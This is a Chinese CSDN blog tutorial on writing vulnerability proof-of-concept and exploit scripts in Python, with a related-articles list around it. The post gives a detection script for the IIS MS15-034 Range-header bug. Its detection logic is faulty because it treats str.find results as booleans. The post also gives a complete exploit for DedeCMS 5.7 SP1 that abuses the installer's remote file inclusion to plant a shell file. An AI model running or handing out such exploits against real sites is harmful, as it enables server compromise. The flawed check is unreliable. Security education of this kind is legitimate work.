POC-EXP编写

最新推荐文章于 2024-01-27 09:46:06 发布
最新推荐文章于 2024-01-27 09:46:06 发布
阅读量3k 收藏 39
点赞数 4
分类专栏: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44110913/article/details/108069030
版权

文章目录

POC

一.概念

漏洞刚被批漏之后,有时候现有的工具里面是没有相应的poc的,那我们可以根据原理写出对应的poc代码,验证漏洞是否存在。

作用:用于漏洞验证,更加高效的快速挖掘漏洞,而不是手工测试,节省时间。

二.思维图解

  1. 深入了解漏洞原理
  2. 拼接payload到url中或者header头和cookies中(大多数情况都这样)
  3. 发起请求
  4. 通过响应头判断中间件和脚本版本
  5. 根据其漏洞特征,判断该漏洞是否存在

在这里插入图片描述

三.代码演示

import requests
a= input('请输入MS_15_034 IP或域名:')
url=a
#1.拼接payload到url中或者header头和cookies中
header={
    'Host': 'stuff',
    'Range': 'bytes=0-18446744073709551615'
}
#2.发起请求
r = requests.get(url,headers=header)
#3.通过响应头判断中间件和脚本版本
server = r.headers['Server']
if server.find('IIS/7.5') or server.find('IIS/8.0'):
#4.根据其漏洞特征,判断该漏洞是否存在
    if r.text.find('Requested Range Not Satisfiable'):
        print('find ms15_035')
    else:
        pass

else:
    print('no find')

附加类似的脚本参考
在这里插入图片描述

EXP

一.概念

漏洞刚被批漏之后,有时候现有的工具里面是没有相应的exp的,那我们可以根据原理写出对应的exp代码,验证漏洞是否存在。

作用:用于漏洞利用,更加高效的漏洞利用,而不是手工测试,节省时间。

二.思维图解

exp编写情况很多,所以了解漏洞原理以后,根据实际情况去编写exp

  1. 深入了解漏洞原理
  2. 创建发起攻击的payload
  3. 发起攻击请求
  4. 判断是否攻击成功

在这里插入图片描述

三.代码演示

织梦5.7 sp1远程文件包含getshell exp

# -*- coding:utf-8 -*-

import requests
import time

def dada(url):
    url_index=url+"/install/index.php"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 \
                            (KHTML, like Gecko) Chrome/51.0.    2704.103 Safari/537.36"}
    try:
        url_request=requests.get(url_index,headers)
        time.sleep(3)
        if(url_request.status_code==200):
            print("漏洞文件存在,开始测试")
            time.sleep(5)
            #创建发起攻击的payload
            url_url = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/admin/config_update.php"  # 重置其参数
            print(url_url)
            #发起攻击请求
            requests.get(url=url_url, headers=headers)  # 发送重置请求
            
			#创建发起攻击的payload
            url_url2 = url + "/install/index.php?step=11&insLockfile=a&s_lang=x&install_demo_name=../data/test.php&updateHost=http://127.0.0.1/"  # 换成存在demodata.x.txt地址
            print(url_url2)
            #发起攻击请求
            requests.get(url=url_url2, headers=headers)  # 发送exp
            url_exp = url + "/data/test.php"
            url_final = requests.get(url=url_exp, headers=headers)
			#判断是否攻击成功
            if url_final.status_code == 200:
                print("攻击成功,请访问 \n "+url_exp)
            else:
                print("测试失败,请人工测试")
        else:
            print("检测完成,该漏洞不存在")

    except:
        print("error:请检测网络或者url地址")

    #print(url)

if __name__ == '__main__':
    dada("http://127.0.0.1/dede/dedecms")
Mamba start
关注
  • 4
    点赞
  • 39
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流[email protected],作为爱好他是免费的。
Pocsuite3框架POC/EXP编写练习:Flask(Jinja2) 服务端模板注入漏洞
qq_46145027的博客
04-19 819
Pocsuite3 是由打造的一款基于 GPLv2 许可证开源的远程漏洞测试框架。可以用来编写POC/EXP,今天借助Flask框架下的SSTI漏洞练习记录一下Pocsuite3框架的配置和编写过程。
exp编写小技巧
m0_49959202的博客
08-14 793
文章目录exp编写小技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload exp编写小技巧 1.代码对齐 exp中填写地址时要注意代码长度的填充 2. 填充为指定长度 3. 链接远程服务器或者链接本地文件 # 远程 r = rem
EXP脚本编写
最新发布
m0_62207482的博客
01-27 760
EXP脚本的编写POC脚本编写一样,只需要修改_attack部分,替换成漏洞 利用的脚本即可。Flask漏洞主要利用了框架的特点,在Flask中,“ {{}}” 中的内容会被当作代码 执行,相应的防御中就需要对“ {{}}”进行过滤,禁止此符号传入参数中。利用Pocsuite 3开源框架,可以接收用户输入的命令行参数,对目标系统进行 半交互控制,具体实现过程如下所示。首先,根据官方文档说明,编写一个接收自定义命令的函数,将接收到的命 令赋值给command参数。,最终效果如 图3-5所示。
最新漏洞POC_exp集合站 IT设备默认用户名密码 证语网络安全Lab
weixin_42744595的博客
08-09 4338
Weaver E-Office9版本存在代码问题漏洞,该漏洞源于文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传。Emobile很难做后续利用,不过如果存在信息泄露风险的可以关注下8泛微E-Office10信息泄露后台+后台文件上传漏洞(Oday)很牛的组合漏洞,office9洞太多用的少没必要写了。10.亿赛通电子文档平台文件上传漏洞市面上的上传1day其实去年补丁都打完了,今年有新的,可以注意下。
2023HW漏洞POC/EXP、情报汇总知识库(0820更新)
lurenjia404的博客
08-21 296
分析结论:木马下载器HW总结模板一2023年,与往年的护网“划水”的角色不同 ,领导鼓励(命令)我今年要扛起写护网总结报告的大旗。作为一线“工具人”,写总结材料真的很头疼,相信很多人和我都有同感。于是在护网开始就开始着手准备总结材料,做到未雨绸缪,尤其是4月护网结束后,下面还有省级、市级护网,以及7月的建党100周年的安保,估计每次都将会少不了总结报告。特从网上搜集了总结模板,分享给大家。由于每家企业防护手段不一、组织架构不一,并且以下案例未必真实,所以完全照抄的可能性不大,所以仅供参考~~~
监控github上最新POC | EXP (图文详细版本)
anan的博客
07-01 2553
目录前言企业微信-server酱推送第一步:注册企业微信第二步:在企业微信创建应用第三步:在企业微信管理后台,通过应用管理创建应用第四步:获取企业ID第五步:将我们上面看到的AgentId、Secret、企业ID都填入下面图片位置第六步:编辑脚本并运行脚本钉钉消息推送第一步:创建钉钉群聊(一个人也能创建)第二步:添加一个机器人并获取它的webhook第三步:编辑脚本第三步:运行脚本第四步:查看设置效果总结关注我 前言 每天各种漏洞被发现,验证漏洞的POC、利用漏洞的EXP也都被各位前辈们快速的“造”出来,在
Poc/Exp漏洞验证利用脚本编写
悦分享
07-07 5316
一、安全名词1. POCPOC,Proof ofConcept,中⽂意思是“观点证明”。这个短语会在漏洞报告中使⽤,漏洞报告中的POC则是⼀段说明或者⼀个攻击的样例,使得读者能够确认这个漏洞是真实存在的。2. EXPEXPExploit,中文叫漏洞利用程序。意思就是该漏洞存在公开的利用方式(比如一个脚本),就是一段可以发挥漏洞价值的程序,对漏洞如何利⽤的详细说明或者⼀个演⽰的漏洞攻击代码,可以使得读者完全了解漏洞的机理以及利⽤的⽅法。想象一下这样的场景,目标存在一个 SQL 注入漏洞,然后被你知道了,然后
渗透中 POCEXP、Payload、Shellcode 的区别
Bulldozer_GD的博客
09-19 868
想象自己是一个特工,你的目标是监控一个重要的人,有一天你怀疑目标家里的窗子可能没有关,于是你上前推了推,结果推开了,这是一个POC。之后你回去了,开始准备第二天的渗透计划,第二天你通过同样的漏洞渗透进了它家,仔细查看了所有的重要文件,离开时还安装了一个隐蔽的窃听器,这一天你所做的就是一个EXP,你在他家所做的就是不同的Payload,就把窃听器当作Shellcode吧!
简单的poc以及exp编写(入门篇)
LINGOVO的博客
12-18 9626
本文中主要针对的是Web应用渗透中的漏洞,而与Web应用之间的交互大多是基于HTTP协议的。所以用到python中与HTTP协议相关的一些模块 一、何为POCEXP POC Proof of Concept中文意思是“观点证明”,是用来检测是否存在漏洞的脚本 EXP Exploit的中文意思是“漏洞利用”,是用来利用该漏洞的脚本 二、基础环境Python3 HTTP 方法 内容 GET 获取资源 POST 传输实体主体 PUT 传输文件 HEAD 获得响应报文首部
如何编写POC/EXP
weixin_45626840的博客
01-10 2437
理解并编写POC/EXP
Some-PoC-oR-ExP:各种漏洞pocExp的收集或编写
04-28
各种漏洞PoCExP的收集或编写 个人偶尔整理收集,仅为安全研究提供参考~ 请勿用于实施违法行为,如由您使用不当引起的法律⻛险,由您⾃主承担~ 一些POC来源
Some-PoC-oR-ExP(各种漏洞pocExp的收集或编写)-20210715.zip
08-05
Some-PoC-oR-ExP(各种漏洞pocExp的收集或编写)
POC-EXP:在某些应用程序上收集和编写PoCEXP的漏洞
05-12
收集和编写PoCEXP的某些应用程序中的漏洞
POC&EXP编写指南.rar
02-11
POC&EXP编写指南 详细讲述了POC&EXP编写方式,很实用
Pocsuite-poc-exp:分享一些自己写的pocexp
05-17
Pocsuite-poc-exp分享一些自己写的poc/exp
python安全编程基础内容
weixin_44110913的博客
08-18 457
socket 所谓套接字(Socket),就是对网络中不同主机上的应用进程之间进行双向通信的端点的抽象。一个套接字就是网络上进程通信的一端,提供了应用层进程利用网络协议交换数据的机制。从所处的地位来讲,套接字上联应用进程,下联网络协议栈,是应用程序通过网络协议进行通信的接口,是应用程序与网络协议根进行交互的接口 if语句 函数 获取banner(服务名称和版本)信息 工具获取banner信息 python获取banner信息 代码改进1—添加if语句判断2.3.4是否在banner信息中 可见
poc-yaml-go-pprof-leak
09-11
根据引用和引用的信息,poc-yaml-go-pprof-leak是一个与pprof定位问题相关的内容。pprof是一个用于性能分析和故障排查的工具,它可以帮助我们定位代码中的问题。通过使用pprof,我们可以获取代码的性能剖析数据,了解代码中的瓶颈和资源泄漏等问题。在引用中提到,虽然一些人可能担心在线上使用pprof会影响性能和存在安全问题,但是在处理问题时,使用pprof来解决问题的好处更大。因此,poc-yaml-go-pprof-leak可能是一个使用pprof来定位代码中资源泄漏问题的实例或教程。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值